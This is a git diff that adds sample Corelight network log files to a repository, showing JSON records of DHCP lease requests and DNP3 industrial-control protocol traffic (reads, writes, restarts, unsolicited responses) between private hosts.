+{"ts":"2018-08-03T23:38:11.306991Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":43642739} +{"ts":"2018-08-03T23:38:11.317151Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":87943645} +{"ts":"2018-08-03T23:38:11.317151Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1931960484} +{"ts":"2018-08-03T23:38:11.342494Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2652711800} +{"ts":"2018-08-03T23:38:11.352593Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3272899711} +{"ts":"2018-08-03T23:38:11.589566Z","uid":"CQcGkX1PaSnGr3ORJ9","id.orig_h":"192.168.0.51","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b2:45","assigned_ip":"192.168.0.51","lease_time":86400.0,"trans_id":1560696338} +{"ts":"2018-08-03T23:38:11.575824Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":2566771647} +{"ts":"2018-08-03T23:38:11.984609Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":4141670463} +{"ts":"2018-08-03T23:38:11.999791Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1757144604} +{"ts":"2018-08-03T23:38:11.999791Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1924876921} +{"ts":"2018-08-03T23:38:12.009884Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":4035554397} +{"ts":"2018-08-03T23:38:12.009884Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":261589857} +{"ts":"2018-08-03T23:38:12.025055Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3617557761} +{"ts":"2018-08-03T23:38:12.055414Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2649671385} +{"ts":"2018-08-03T23:38:12.070609Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1494578736} +{"ts":"2018-08-03T23:38:12.070609Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1051990411} +{"ts":"2018-08-03T23:38:12.070609Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1039709685} +{"ts":"2018-08-03T23:38:12.070609Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3880840416} +{"ts":"2018-08-03T23:38:12.070609Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3660315464} +{"ts":"2018-08-03T23:38:12.080740Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":815789708} +{"ts":"2018-08-03T23:38:12.095928Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3743638281} +{"ts":"2018-08-03T23:38:12.095928Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1337501349} +{"ts":"2018-08-03T23:38:12.095928Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1258329928} +{"ts":"2018-08-03T23:38:12.111114Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":2557927961} +{"ts":"2018-08-03T23:38:12.111114Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1477319831} +{"ts":"2018-08-03T23:38:12.170735Z","uid":"CQcGkX1PaSnGr3ORJ9","id.orig_h":"192.168.0.51","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b2:45","assigned_ip":"192.168.0.51","lease_time":86400.0,"trans_id":1560696338} +{"ts":"2018-08-03T23:38:12.146494Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2672950712} +{"ts":"2018-08-03T23:38:12.171868Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":4118240710} +{"ts":"2018-08-03T23:38:12.171868Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2623943672} +{"ts":"2018-08-03T23:38:12.222921Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":4235446386} +{"ts":"2018-08-03T23:38:12.263420Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":3991160247} +{"ts":"2018-08-03T23:38:12.263420Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":0.0,"trans_id":1594558293} +{"ts":"2018-08-03T23:38:12.252720Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":3240217888} +{"ts":"2018-08-03T23:38:12.252720Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":3792310629} +{"ts":"2018-08-03T23:38:12.252720Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":4073345497} +{"ts":"2018-08-03T23:38:12.262909Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1730049840} +{"ts":"2018-08-03T23:38:12.303435Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3306242705} +{"ts":"2018-08-03T23:38:12.303435Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":720426885} +{"ts":"2018-08-03T23:38:12.303435Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3927183694} +{"ts":"2018-08-03T23:38:12.318603Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1363038620} +{"ts":"2018-08-03T23:38:12.333789Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":665072402} +{"ts":"2018-08-03T23:38:12.333789Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3146551556} +{"ts":"2018-08-03T23:38:12.348954Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3860521089} +{"ts":"2018-08-03T23:38:12.348954Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1837343718} +{"ts":"2018-08-03T23:38:12.348954Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1194194966} +{"ts":"2018-08-03T23:38:12.369153Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3297715888} +{"ts":"2018-08-03T23:38:12.429921Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3974764275} +{"ts":"2018-08-03T23:38:12.429921Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2703873082} +{"ts":"2018-08-03T23:38:12.429921Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3341654289} +{"ts":"2018-08-03T23:38:12.429921Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3177723633} +{"ts":"2018-08-03T23:38:12.429921Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2930208573} +{"ts":"2018-08-03T23:38:12.429921Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1779914700} +{"ts":"2018-08-03T23:38:12.429921Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":4001289344} +{"ts":"2018-08-03T23:38:12.429921Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3994273} +{"ts":"2018-08-03T23:38:12.429921Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1824973833} +{"ts":"2018-08-03T23:38:12.429921Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":248592589} +{"ts":"2018-08-03T23:38:12.429921Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2526240769} +{"ts":"2018-08-03T23:38:12.440027Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3822704440} +{"ts":"2018-08-03T23:38:12.440027Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2037207477} +{"ts":"2018-08-03T23:38:12.440027Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1563554100} +{"ts":"2018-08-03T23:38:12.440027Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3195050673} +{"ts":"2018-08-03T23:38:12.440027Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2833452142} \ No newline at end of file diff --git a/Sample Data/Custom/Corelight/dnp3_20180803_16:39:01-16:40:00-0700.log_ b/Sample Data/Custom/Corelight/dnp3_20180803_16:39:01-16:40:00-0700.log_ new file mode 100644 index 0000000000..4a78809cce --- /dev/null +++ b/Sample Data/Custom/Corelight/dnp3_20180803_16:39:01-16:40:00-0700.log_ @@ -0,0 +1,65 @@ +{"ts":"2018-08-03T23:39:01.434681Z","uid":"CMY1OYctlBZ1FMkyg","id.orig_h":"10.0.0.8","id.orig_p":2828,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":4096} +{"ts":"2018-08-03T23:39:01.434681Z","uid":"CMY1OYctlBZ1FMkyg","id.orig_h":"10.0.0.8","id.orig_p":2828,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"WRITE","fc_reply":"RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.434681Z","uid":"CMY1OYctlBZ1FMkyg","id.orig_h":"10.0.0.8","id.orig_p":2828,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"ENABLE_UNSOLICITED","fc_reply":"RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.434681Z","uid":"CMY1OYctlBZ1FMkyg","id.orig_h":"10.0.0.8","id.orig_p":2828,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.434681Z","uid":"CMY1OYctlBZ1FMkyg","id.orig_h":"10.0.0.8","id.orig_p":2828,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"CONFIRM","fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.438427Z","uid":"CIn3qJ2Ze8XSiRTr6g","id.orig_h":"10.0.0.8","id.orig_p":2789,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":4096} +{"ts":"2018-08-03T23:39:01.438427Z","uid":"CIn3qJ2Ze8XSiRTr6g","id.orig_h":"10.0.0.8","id.orig_p":2789,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"WRITE","fc_reply":"RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.438427Z","uid":"CIn3qJ2Ze8XSiRTr6g","id.orig_h":"10.0.0.8","id.orig_p":2789,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"DISABLE_UNSOLICITED","fc_reply":"RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"COLD_RESTART","fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"READ","fc_reply":"RESPONSE","iin":32768} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":32768} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"DISABLE_UNSOLICITED","fc_reply":"RESPONSE","iin":32768} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"WRITE","fc_reply":"RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"READ","fc_reply":"RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"ENABLE_UNSOLICITED","fc_reply":"RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"ENABLE_UNSOLICITED","fc_reply":"RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.437322Z","uid":"CJZFGE14wEUcLqPjlk","id.orig_h":"10.0.0.9","id.orig_p":1080,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.436482Z","uid":"CqCwdk1qhBiiOcy194","id.orig_h":"10.0.0.8","id.orig_p":1086,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":36864} +{"ts":"2018-08-03T23:39:01.436482Z","uid":"CqCwdk1qhBiiOcy194","id.orig_h":"10.0.0.8","id.orig_p":1086,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"DISABLE_UNSOLICITED","fc_reply":"RESPONSE","iin":36864} +{"ts":"2018-08-03T23:39:01.436482Z","uid":"CqCwdk1qhBiiOcy194","id.orig_h":"10.0.0.8","id.orig_p":1086,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"WRITE","fc_reply":"RESPONSE","iin":32768} +{"ts":"2018-08-03T23:39:01.436482Z","uid":"CqCwdk1qhBiiOcy194","id.orig_h":"10.0.0.8","id.orig_p":1086,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"DISABLE_UNSOLICITED","fc_reply":"RESPONSE","iin":32768} +{"ts":"2018-08-03T23:39:01.436482Z","uid":"CqCwdk1qhBiiOcy194","id.orig_h":"10.0.0.8","id.orig_p":1086,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"WRITE","fc_reply":"RESPONSE","iin":32768} +{"ts":"2018-08-03T23:39:01.436482Z","uid":"CqCwdk1qhBiiOcy194","id.orig_h":"10.0.0.8","id.orig_p":1086,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"DISABLE_UNSOLICITED","fc_reply":"RESPONSE","iin":32768} +{"ts":"2018-08-03T23:39:01.436482Z","uid":"CqCwdk1qhBiiOcy194","id.orig_h":"10.0.0.8","id.orig_p":1086,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"WRITE","fc_reply":"RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.436482Z","uid":"CqCwdk1qhBiiOcy194","id.orig_h":"10.0.0.8","id.orig_p":1086,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"READ","fc_reply":"RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.436482Z","uid":"CqCwdk1qhBiiOcy194","id.orig_h":"10.0.0.8","id.orig_p":1086,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"WARM_RESTART","fc_reply":"RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.436482Z","uid":"CqCwdk1qhBiiOcy194","id.orig_h":"10.0.0.8","id.orig_p":1086,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_request":"WARM_RESTART","fc_reply":"RESPONSE","iin":0} +{"ts":"2018-08-03T23:39:01.438545Z","uid":"C3mFV02HwzlCkmUQvc","id.orig_h":"10.0.0.8","id.orig_p":1184,"id.resp_h":"10.0.0.3","id.resp_p":20000,"fc_reply":"UNSOLICITED_RESPONSE","iin":4096} 